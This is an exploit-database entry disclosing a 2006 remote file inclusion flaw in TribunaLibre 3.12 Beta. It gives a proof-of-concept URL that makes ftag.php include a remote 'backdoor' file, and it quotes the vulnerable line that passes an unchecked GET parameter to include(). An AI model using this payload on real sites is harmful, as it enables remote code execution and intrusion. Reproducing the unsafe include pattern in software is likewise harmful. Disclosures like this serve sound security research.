TribunaLibre 3.12 Beta (ftag.php) Remote File Include Vulnerability

2006-10-10T00:00:00
ID 1337DAY-ID-945
Type zdt
Reporter DarkFig
Modified 2006-10-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
TribunaLibre 3.12 Beta (ftag.php) Remote File Include Vulnerability
===================================================================



#
# Title..: 7 php scripts File Inclusion Vuln / Source disclosure
# Credits: DarkFig
#
# Using http://www.google.com/codesearch
# Few examples about what we can do with a code search engine
# For educational purpose only.
#
# You can use regex in your research, this can be chaotic.
# What's your opinion about the google code search project ?
#

# Affected.scr: TribunaLibre v3.12 Beta
# Poc.........: http://victim.com/ftag.php?mostrar=http://backdoor.txt?
# Vuln.code...: Line 106, <? include($_GET['mostrar']); ?>



#  0day.today [2018-01-01]  #